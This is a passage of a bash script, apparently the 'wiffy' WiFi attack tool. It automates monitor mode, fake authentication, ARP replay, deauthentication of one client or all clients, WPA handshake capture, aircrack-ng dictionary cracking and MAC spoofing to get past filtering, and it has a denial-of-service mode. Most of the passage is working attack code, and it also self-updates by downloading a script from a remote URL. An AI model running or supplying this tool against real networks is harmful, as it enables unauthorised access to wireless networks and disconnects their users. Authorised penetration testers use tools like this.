's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && 